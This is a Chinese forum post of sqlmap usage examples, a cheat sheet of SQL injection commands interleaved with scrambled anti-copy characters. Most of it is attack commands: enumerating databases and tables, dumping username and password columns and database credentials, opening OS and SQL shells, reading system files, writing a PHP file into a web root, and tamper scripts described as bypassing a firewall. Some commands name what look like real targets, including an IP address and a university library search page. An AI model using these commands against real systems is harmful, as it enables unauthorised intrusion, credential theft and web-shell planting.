找回密码
 立即注册
查看: 2632|回复: 0
打印 上一主题 下一主题

sqlmap使用实例

[复制链接]
跳转到指定楼层
楼主
发表于 2017-5-19 17:03:10 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
/pentest/database/sqlmap5 ^4 Q  H/ S; @% g" b

9 }; s' n) S  b% q) I1 [update :::::>     in the folder   after  execute    following   order : svn update% y+ r) m6 A) `! Y  c
7 H# J' K* M+ _% b& z$ C
sqlmap.py -r 1.txt --current-db
3 D& s' h+ T1 j- F: D2 d: ^( Q+ D% V  X' W$ d' T
v 3 –dbms “MySQL” –technique U -p id –batch –tamper “space2morehash.py”
' p% P- r( l4 e4 q, }% m  n. }% c/ v5 k. W0 p4 k6 S
==================基本使用方法==========================elect (select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e) from phpcms_member limit 0,1)) & N4 T; L# z% ^" P4 r0 S; r8 N  N5 h
猜解数据库
' J4 D  x8 T- L/ G: c./sqlmap.py -u "injection-url" --dbs
- |% d+ O$ P: D* V3 ssqlmap.py -r 1.txt -v 3 --dbs --tamper "space2morehash.py"
7 k! C  m2 [  g, c& o( j
8 [5 I6 p* k3 r- y猜解表名
2 v1 a+ Q" q/ h8 X, O- Z./sqlmap.py -u "injection-url" -D database_name --tables( }! F& e0 P4 P+ _1 j1 e! V

1 X9 Q- S" @8 Z) b( V4 Qsqlmap.py -r 1.txt -v 1 -D jsst --tables --batch --tamper "space2morehash.py"% O. w$ @* d) Y' o, H; L8 f1 f2 a
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member_info --columns --batch --tamper "space2morehash.py" ; C7 j& M( W  U( I( y: \# p
' L) j- x! s3 y) y
sqlmap.py -r 1.txt -D mail -T F_domain -C F_email,F_password --dump& `1 H/ {& p& q3 ]7 B

0 ^1 f$ B6 g1 n6 j- [sqlmap.py -r 1.txt -v 1 --os-shell --tamper "chardoubleencode.py"
9 t$ ^# c& t0 p6 x6 H+ Ssqlmap.py -r 1.txt -v 3 --os-shell --tamper "chardoubleencode.py"
8 e: ]" w& T& R7 n: x  r- Psqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:\Bitnami\wampstack-5.4.29-0\apache2\htdocs\en\fckeditor\help888.php --tamper "chardoubleencode.py"
# r0 k. i  O: J# Gsqlmap.py -r 1.txt --dbms "Mysql" --os-shell --tamper "charunicodeencode.py"
/ ^. ]- d" Z( q" D$ e
+ A7 k1 a! s; l, E/ p) a* a1 dsqlmap.py -u "http://121.15.0.227/en/list.php?catid=74" --os-shell -v3 --tamper "charunicodeencode.py"
4 l+ _/ O, G. r: isqlmap.py -r 1.txt -v 3 --sql-query "desc jsgen_member;" --batch --tamper "space2morehash.py"' \" j% D* Z: G& |, H/ x
sqlmap.py -r 1.txt -v 3 --sql-query "show create table jsgen_member;" --batch --tamper "space2morehash.py"
' ?; n0 R$ p0 @* t4 ]5 p& t6 l) B7 Isqlmap.py -r 1.txt -v 3 --sql-query "select user();" --batch --tamper "space2morehash.py"
  |3 Z9 u% b/ v& |; t, }sqlmap.py -r 1.txt -D jsst -T phpcms_member -C username,password --dump
/ {4 f- q8 q( a, M5 V
% `" v8 N( \: L1 H/ wsqlmap.py -r 1.txt -v 3 --dbs  --batch --tamper "space2morehash.py" 绕过防火墙了
  W- `3 n; y8 s5 xsqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C ,userid,username,password, --dump --batch --tamper "space2morehash.py"
7 }8 K7 Y1 t) Q( Q* ]% y
( W& A6 S4 T6 ?4 {* E0 j; Esqlmap.py -r 1.txt --dbms "Mysql" --tables -D "jsst"
) x5 B7 N' O& d$ g8 u猜解列名) Y9 Y! T- D6 S' F
./sqlmap.py -u "injection-url" -D database_name -T table_name --columns
7 u2 R  l: t" h$ h0 m$ W$ }; U1 ?: e& m1 X6 v& k
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member --columns --batch --tamper "space2morehash.py"
9 E/ l2 M0 R/ e" Gsqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_session --columns --batch --tamper "space2morehash.py" 4 Z9 ~4 S- t3 v5 F$ ~; ], c2 ]
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C userid,groupid,username,password,touserid,point,modelid,email,areaid --dump --batch --tamper "charunicodeencode.py"
* ~6 J- S% g# I; B) r8 ]6 P3 _* s2 a5 d
sqlmap.py -u "http://cityusr.lib.cityu.edu.hk/jspui/simple-search?query=1" --batch --tamper "space2morehash.py"( X( G- M$ I4 u6 d  |
&submit=Go7 |- j$ R3 R; b. H% F/ @
猜解值& J% h. G" i( m9 e
./sqlmap.py -u "injection-url" -D database_name -T table_name -C column1,column2 --dump
  S5 h7 V* N6 u' `+ z. R; }1 |========================================================
1 N/ N7 B( R8 ]3 y搜索表名中包括mana字符的9 b5 R0 x: x, y5 M
/sqlmap.py -u "injection-url" -T mana --search# l1 ]2 z  G+ A  E, W: C. R. E1 x5 x
返回一个交互式sql shell, F8 m- }* F" x6 Y( N9 ~
/sqlmap.py -u "injection-url" --sql-shell
6 Y3 S$ u9 {& j) @$ S8 w8 S读取指定文件(需权限)# G2 Y) l# m+ X5 f  b
/sqlmap.py -u "injection-url" --file-read "c:\boot.ini"0 d; ?$ o+ h+ [8 w. N; d" h  L, v
查看当前 用户 及 数据库
0 {0 {% j0 \  t; h5 B% V) D5 b/sqlmap.py -u "injection-url" --current-user --current-db
# ]# `6 F- D# r: K0 k/ n本地文件 写入 远程目标绝对路径
( U8 `% C' `# M& P/sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径0 G2 e4 ~" B7 l$ Y: C
sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:/Bitnami/wampstack-5.4.29-0/apache2/htdocs/en/fckeditor\help888.php --tamper "charunicodeencode.py" 0 R) M/ v& M: O4 c. S2 M
7 T& t6 n1 M+ W: |
sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径' q. b/ R( K0 D% `
查看某用的权限: u/ a7 g& q$ w) \) N* T& y+ `
/sqlmap.py -u "injection-url" --privileges -U root
* q* Y% O* P" @4 A. A3 g查看当前用户是否为dba2 _" P8 z/ [- z
/sqlmap.py -u "injection-url" --is-dba
( @) n" w$ E$ h% |8 y8 j读取所有数据库用户或指定数据库用户的密码
) V" k/ |& i; |" N4 x; j, vsqlmap.py -r 1.txt --users --passwords
0 a9 N6 Z1 D/ c5 a1 t: s# i% T1 `' |sqlmap.py -r 1.txt -v 3 --users --passwords --batch --tamper "space2morehash.py"
9 O* I1 y3 N0 d/ r0 ?+ m3 Q/ }- c
/sqlmap.py -u "injection-url" --passwords -U root
5 [/ j* m  s8 T) f8 a+ U
$ C, r% h& c! R& Q8 Q--start&&--stop 与 --first&&--last 的区别6 F" B) V$ P+ n6 z$ F
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D phpcms -T phpcms_member --start=1 --stop=2 --dump   (--start=1 --stop=2 会列出第二条记录。。。。记录例如:0 1 2 3 ……)( v' s  B, [, y% ^; W4 }) R# f
. }, ^5 B) @- W$ Y
从字典中查找(属于暴利破解)存在的表(sqlmap/txt/common-tables.txt)或字段(sqlmap/txt/common-columns.txt)( B1 J( g* s+ R
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name --common-tables
6 W9 W4 n: q: E* n' F/ Y+ W/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name -T table_name --common-columns: r  n/ g4 L' y% I) P/ |) _
3 c; g/ a. s+ x3 [' z; @
执行sql语句,如查询@@datadir得到数据库路径(或者user()/database()等等……)
/ o, `% m. s5 D$ h2 R7 b/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" --sql-query "select @@ip"
5 L  i7 n1 S7 X1 U( u+ j4 ]  g! w) Q8 [1 R/ d
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表